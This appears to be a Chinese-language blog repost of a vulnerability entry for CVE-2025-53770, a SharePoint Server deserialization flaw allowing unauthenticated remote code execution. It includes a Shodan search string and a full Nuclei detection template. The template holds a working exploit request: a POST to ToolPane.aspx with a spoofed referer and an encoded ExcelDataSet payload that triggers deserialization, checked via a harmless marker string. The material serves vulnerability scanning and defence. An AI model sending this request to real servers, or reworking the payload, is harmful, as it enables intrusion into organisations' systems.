Microsoft SharePoint Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Microsoft SharePoint Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-53770

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: Microsoft SharePoint Server是一款广泛使用的企业级协作平台,支持文档管理、团队协作和业务流程自动化等多种功能,常见于大型企业和组织中。此次曝光的漏洞CVE-2025-53770涉及SharePoint Server中的反序列化问题,攻击者可以通过网络利用未经验证的反序列化操作执行任意代码。该漏洞的技术根源在于SharePoint Server在处理特定输入时未能正确验证和清理数据,导致攻击者可以构造恶意数据触发反序列化过程,进而执行任意代码。由于攻击者无需认证即可利用此漏洞,且已有公开的漏洞利用代码,因此该漏洞被评定为严重级别。成功利用此漏洞的攻击者可以完全控制受影响的SharePoint Server,导致数据泄露、服务中断或其他恶意操作。微软已经意识到该漏洞的存在,并正在准备全面的更新来修复此问题。在此期间,建议用户按照CVE文档中提供的缓解措施进行防护,以避免受到攻击。

产品厂商: Microsoft

产品名称: SharePoint Server

搜索语法: http.component:”Sharepoint”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/f9cb5bbd752422799605213c175b5701549025e2/http%2Fcves%2F2025%2FCVE-2025-53770.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

id: CVE-2025-53770

info:
  name: Microsoft SharePoint - Remote Code Execution "Toolshell"
  author: SamIntruder
  severity: critical
  description: |
    Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability.In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.
  reference:
    - https://github.com/hazcod/CVE-2025-53770/blob/main/pkg/payload/test_payload.go
    - https://x.com/codewhitesec/status/1944743478350557232
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53770
  classification:
    cve-id: CVE-2025-53770
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Sharepoint"
  tags: cve,cve2025,kev,sharepoint,rce

http:
  - raw:
    - |
      POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
      Host: {{Host}}
      Referer: /_layouts/SignOut.aspx
      Content-Type: application/x-www-form-urlencoded

      MSOTlPn_Uri={{Scheme}}://{{Host}}&MSOTlPn_DWP=%0A%3C%25%40%20Register%20Tagprefix%3D%22Scorecard%22%20Namespace%3D%22Microsoft%2EPerformancePoint%2EScorecards%22%20Assembly%3D%22Microsoft%2EPerformancePoint%2EScorecards%2EClient%2C%20Version%3D16%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D71e9bce111e9429c%22%20%25%3E%0A%3C%25%40%20Register%20Tagprefix%3D%22asp%22%20Namespace%3D%22System%2EWeb%2EUI%22%20Assembly%3D%22System%2EWeb%2EExtensions%2C%20Version%3D4%2E0%2E0%2E0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35%22%20%25%3E%0A%3Casp%3AUpdateProgress%20ID%3D%22UpdateProgress1%22%20DisplayAfter%3D%2210%22%20runat%3D%22server%22%20AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%20%20%3CProgressTemplate%3E%0A%20%20%20%20%3Cdiv%20class%3D%22divWaiting%22%3E%0A%20%20%20%20%20%20%3CScorecard%3AExcelDataSet%20CompressedDataTable%3D%22H4sIAADEfmgA%2F4WRX2uzMBTG7%2F0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9%2BPEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c%2Bc1Umalp33%2F0%2F62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl%2BftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S%2FVeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1%2Bt%2Fpbj%2BvyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA%3D%22%20DataTable%2DCaseSensitive%3D%22false%22%20runat%3D%22server%22%3E%3C%2FScorecard%3AExcelDataSet%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'CompressedDataTable="(.*?)"'
        name: encoded_response
        internal: true

    matchers:
      - type: dsl
        name: decoded_response
        dsl:
          - 'contains(gzip_decode(base64_decode(encoded_response)), "IntruderScannerDetectionPayload")'
          - 'status_code == 200'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #反序列化
Microsoft SharePoint Remote Code Execution Vulnerability
http://example.com/2025/07/22/github_3911484895/
作者
lianccc
发布于
2025年7月22日
许可协议